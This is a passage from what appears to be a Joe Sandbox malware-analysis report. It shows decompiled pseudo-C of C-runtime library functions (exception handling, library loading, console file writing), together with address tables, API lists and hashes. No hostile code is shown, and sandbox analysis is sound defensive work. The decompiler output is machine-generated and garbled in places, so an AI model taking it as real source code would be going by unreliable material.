				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = E00BD1CCE(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E00BD1CCE(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E00BD436E(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E00BD421E(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00BD7E87(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E00BD1C3C(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E00BD6260(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E00BD6260(_t65, _t83);
				}
			}






































                          0x00bd7f07
                          0x00bd7f07
                          0x00bd7f07
                          0x00bd7f0e
                          0x00bd7f17
                          0x00bd8036
                          0x00bd7f1d
                          0x00bd7f1d
                          0x00bd7f1e
                          0x00bd7f1f
                          0x00bd7f29
                          0x00bd7f2c
                          0x00bd7f32
                          0x00bd7f3c
                          0x00bd7f61
                          0x00bd7f66
                          0x00bd7f6b
                          0x00bd8032
                          0x00000000
                          0x00bd8033
                          0x00bd7f6b
                          0x00bd7f3c
                          0x00bd7f71
                          0x00bd7f74
                          0x00bd7f77
                          0x00bd7f7d
                          0x00bd7f95
                          0x00bd7f9a
                          0x00bd7f9d
                          0x00bd7fa0
                          0x00bd7fa3
                          0x00bd7fa6
                          0x00bd7fac
                          0x00bd7fb2
                          0x00bd7fb5
                          0x00bd7fb8
                          0x00bd7fc7
                          0x00bd7fc8
                          0x00bd7fc8
                          0x00bd7fcd
                          0x00bd7fe0
                          0x00bd7fe2
                          0x00bd7fe7
                          0x00bd7ff2
                          0x00bd7ff4
                          0x00bd7ff6
                          0x00bd8012
                          0x00bd8017
                          0x00bd801a
                          0x00bd801a
                          0x00bd7ff2
                          0x00bd7fe7
                          0x00bd8020
                          0x00bd8021
                          0x00bd8024
                          0x00bd8027
                          0x00bd802a
                          0x00bd802d
                          0x00bd7fb8
                          0x00000000
                          0x00bd7fac
                          0x00bd8037
                          0x00bd803c
                          0x00bd803d
                          0x00bd803e
                          0x00bd803f
                          0x00bd804e
                          0x00bd805e
                          0x00bd8065
                          0x00bd806b
                          0x00bd806c
                          0x00bd8078
                          0x00bd807a
                          0x00bd807a
                          0x00bd8089
                          0x00bd8089

                          APIs
                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00BD7E0D,?,?,00000000,00000000,00000000,?), ref: 00BD7F2C
                          • CatchIt.LIBVCRUNTIME ref: 00BD8012
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CatchEncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 1435073870-2084237596
                          • Opcode ID: 0bb3774276baa14baa0508e5ad3cefeaf107f097f9451cbcbadb9e10e5958baf
                          • Instruction ID: f79f72a04eba236f7e420f96e500088d6f64eff143b3acda7b252c2390273f41
                          • Opcode Fuzzy Hash: 0bb3774276baa14baa0508e5ad3cefeaf107f097f9451cbcbadb9e10e5958baf
                          • Instruction Fuzzy Hash: A2414975900249AFCF26DF98CC81AEEBBF5FF48314F18409AF904AB251E735A950DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC3210 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41timewindowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: MessagePostTimer
                          • String ID: 2$2
                          • API String ID: 2370412193-3784399050
                          • Opcode ID: fdede31c41a4c77744416b9a4f81e9766c8e3396572488db13c9c87d5eda5e2e
                          • Instruction ID: 14519b8a2f48ebe8d5ca6499549a74224cf98dbbda9ff692056c3e88a690c802
                          • Opcode Fuzzy Hash: fdede31c41a4c77744416b9a4f81e9766c8e3396572488db13c9c87d5eda5e2e
                          • Instruction Fuzzy Hash: 14119574104204EFDB40EF58D189BA97BE0FB04754F85C4A9F8898F291D7B59A84DF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD60E6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD60E6(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00BD4AB9(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                          0x00bd60f3
                          0x00bd60fb
                          0x00bd6130
                          0x00bd60fd
                          0x00bd6106
                          0x00000000
                          0x00bd612d
                          0x00bd612c
                          0x00bd612c

                          APIs
                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00BD6182,?,?,00000000,?,?,?,00BD5FCA,00000000,FlsAlloc,00BDD668,00BDD670), ref: 00BD60F3
                          • GetLastError.KERNEL32(?,00BD6182,?,?,00000000,?,?,?,00BD5FCA,00000000,FlsAlloc,00BDD668,00BDD670,?,?,00BD1C8A), ref: 00BD60FD
                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00BD1C8A,00BD1D6E,00000003,00BD14EB,?,?,?,?,00000000,00000000,00000000), ref: 00BD6125
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: 724329961c425ce62b6700f5c1ba2a0763fa2ac5545ca456a85b7fce5f30c762
                          • Instruction ID: e8753e713a4d15a49d3127daf1da40b5e1d6c9c01e19efe039b741ba7b6cc915
                          • Opcode Fuzzy Hash: 724329961c425ce62b6700f5c1ba2a0763fa2ac5545ca456a85b7fce5f30c762
                          • Instruction Fuzzy Hash: 5BE04F30680248BBEB101F65EC47F587FA8EB04B80F20C472F90DB82E2EFB1D8548944
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD6A21 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E00BD6A21(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0xbdafed);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0xbe4050; // 0xe9e688dc
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0xbe62e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E00BD14F0(_t265, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0xbe62e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0xbe62e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0xbe62e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E00BD87A5(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00BD87A5(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0xbe47b0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0xbe62e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E00BD89E0( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0xbe47b0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0xbe62e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E00BCF710( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0xbe62e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E00BD89E0( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00BD5A89(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E00BCDB85(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































                          0x00bd6a26
                          0x00bd6a28
                          0x00bd6a33
                          0x00bd6a34
                          0x00bd6a37
                          0x00bd6a3c
                          0x00bd6a3e
                          0x00bd6a44
                          0x00bd6a48
                          0x00bd6a4e
                          0x00bd6a53
                          0x00bd6a59
                          0x00bd6a5c
                          0x00bd6a5f
                          0x00bd6a62
                          0x00bd6a65
                          0x00bd6a68
                          0x00bd6a72
                          0x00bd6a79
                          0x00bd6a81
                          0x00bd6a84
                          0x00bd6a8a
                          0x00bd6a8e
                          0x00bd6a91
                          0x00bd6a95
                          0x00bd6a95
                          0x00bd6a9d
                          0x00bd6aa5
                          0x00bd6aaa
                          0x00bd6aab
                          0x00bd6aac
                          0x00bd6aad
                          0x00bd6ab0
                          0x00bd6ab2
                          0x00bd6ab8
                          0x00bd6abe
                          0x00bd6ac1
                          0x00bd6ac3
                          0x00bd6ac6
                          0x00bd6acf
                          0x00bd6ad5
                          0x00bd6ad8
                          0x00bd6adf
                          0x00bd6ae6
                          0x00bd6ae9
                          0x00bd6c23
                          0x00bd6c27
                          0x00bd6c2a
                          0x00bd6c4d
                          0x00bd6c53
                          0x00bd6c55
                          0x00bd6c59
                          0x00bd6c8a
                          0x00bd6c8d
                          0x00bd6c8f
                          0x00000000
                          0x00bd6c5b
                          0x00bd6c5b
                          0x00bd6c5e
                          0x00bd6c61
                          0x00bd6c64
                          0x00bd6dae
                          0x00bd6dbc
                          0x00bd6dc5
                          0x00bd6c6a
                          0x00bd6c74
                          0x00bd6c79
                          0x00bd6c7c
                          0x00bd6c7f
                          0x00bd6c85
                          0x00000000
                          0x00bd6c85
                          0x00bd6c7f
                          0x00bd6c64
                          0x00bd6c2c
                          0x00bd6c33
                          0x00bd6c36
                          0x00bd6c39
                          0x00bd6c3b
                          0x00bd6c3e
                          0x00bd6c45
                          0x00bd6c47
                          0x00bd6c90
                          0x00bd6c93
                          0x00bd6c94
                          0x00bd6c99
                          0x00bd6c9c
                          0x00bd6c9f
                          0x00bd6ca5
                          0x00000000
                          0x00bd6ca5
                          0x00bd6c9f
                          0x00bd6aef
                          0x00bd6af2
                          0x00bd6af4
                          0x00bd6af6
                          0x00bd6afa
                          0x00bd6afb
                          0x00bd6aff
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd6aff
                          0x00bd6b04
                          0x00bd6b06
                          0x00bd6b0b
                          0x00bd6bcb
                          0x00bd6bd2
                          0x00bd6bd3
                          0x00bd6bd6
                          0x00bd6bd8
                          0x00bd6d88
                          0x00bd6d8a
                          0x00000000
                          0x00bd6d8c
                          0x00bd6d8c
                          0x00bd6d8f
                          0x00bd6d9e
                          0x00bd6da2
                          0x00bd6da3
                          0x00bd6da3
                          0x00000000
                          0x00bd6da7
                          0x00000000
                          0x00bd6bde
                          0x00bd6be3
                          0x00bd6be6
                          0x00bd6be9
                          0x00bd6bef
                          0x00bd6bf8
                          0x00bd6c03
                          0x00bd6c08
                          0x00bd6c0b
                          0x00bd6c0e
                          0x00bd6c17
                          0x00bd6c17
                          0x00bd6c1a
                          0x00000000
                          0x00bd6c1a
                          0x00bd6c0e
                          0x00bd6b11
                          0x00bd6b14
                          0x00bd6b1a
                          0x00bd6b1c
                          0x00bd6b29
                          0x00bd6b2a
                          0x00bd6b2d
                          0x00bd6b30
                          0x00bd6b35
                          0x00bd6d59
                          0x00bd6d5b
                          0x00bd6d5d
                          0x00bd6d60
                          0x00bd6d63
                          0x00bd6d6f
                          0x00bd6d72
                          0x00bd6d74
                          0x00bd6d75
                          0x00bd6d79
                          0x00bd6d7c
                          0x00bd6d7c
                          0x00bd6d80
                          0x00bd6d80
                          0x00bd6d80
                          0x00bd6d83
                          0x00bd6d83
                          0x00bd6b3b
                          0x00bd6b3b
                          0x00bd6b3e
                          0x00bd6b40
                          0x00bd6b43
                          0x00bd6b45
                          0x00bd6b49
                          0x00bd6b4a
                          0x00bd6b4b
                          0x00bd6b4f
                          0x00bd6b54
                          0x00bd6b5e
                          0x00bd6b63
                          0x00bd6b66
                          0x00bd6b66
                          0x00bd6b69
                          0x00bd6b6c
                          0x00bd6b6e
                          0x00bd6b71
                          0x00bd6b7a
                          0x00bd6b7e
                          0x00bd6b7f
                          0x00bd6b86
                          0x00bd6b8c
                          0x00bd6b94
                          0x00bd6b9f
                          0x00bd6ba4
                          0x00bd6baf
                          0x00bd6bb4
                          0x00bd6bba
                          0x00bd6bc3
                          0x00bd6c1d
                          0x00bd6c1d
                          0x00bd6ca8
                          0x00bd6cad
                          0x00bd6cbf
                          0x00bd6cc4
                          0x00bd6cc7
                          0x00bd6ccc
                          0x00bd6ce7
                          0x00bd6dca
                          0x00bd6dd0
                          0x00bd6ced
                          0x00bd6ced
                          0x00bd6cf8
                          0x00bd6cfa
                          0x00bd6cfd
                          0x00bd6d06
                          0x00bd6d10
                          0x00000000
                          0x00bd6d12
                          0x00bd6d14
                          0x00bd6d16
                          0x00bd6d2f
                          0x00000000
                          0x00bd6d35
                          0x00bd6d39
                          0x00bd6d3f
                          0x00bd6d42
                          0x00bd6d48
                          0x00bd6d4b
                          0x00000000
                          0x00bd6d4b
                          0x00bd6d39
                          0x00bd6d2f
                          0x00bd6d10
                          0x00bd6d06
                          0x00bd6ce7
                          0x00bd6ccc
                          0x00bd6bba
                          0x00bd6b35
                          0x00bd6b0b
                          0x00000000
                          0x00bd6d4e
                          0x00bd6d4e
                          0x00bd6d57
                          0x00bd6dd2
                          0x00bd6dd7
                          0x00bd6ddf
                          0x00bd6de0
                          0x00bd6de1
                          0x00bd6ded
                          0x00000000

                          APIs
                          • GetConsoleOutputCP.KERNEL32(E9E688DC,?,00000000,?), ref: 00BD6A84
                            • Part of subcall function 00BD5A89: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00BD64FD,?,00000000,-00000008), ref: 00BD5B35
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BD6CDF
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BD6D27
                          • GetLastError.KERNEL32 ref: 00BD6DCA
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 38a4151102046408060f2a5882afe19581f976a3b990468980e688c53600540f
                          • Instruction ID: fc84b8c738610c3a19ad2087a7001c1ca18ec8da9abc63e2eaa12a8eaa91a840
                          • Opcode Fuzzy Hash: 38a4151102046408060f2a5882afe19581f976a3b990468980e688c53600540f
                          • Instruction Fuzzy Hash: F5D14775E002589FCB15CFA8D880AADFBF5FF09304F1845AAE955EB351E730A951CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD790B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 70%
                          			E00BD790B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0xbe3388);
				E00BCD960(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00BCF710(_t107, E00BCDDA0(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00BCF710(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
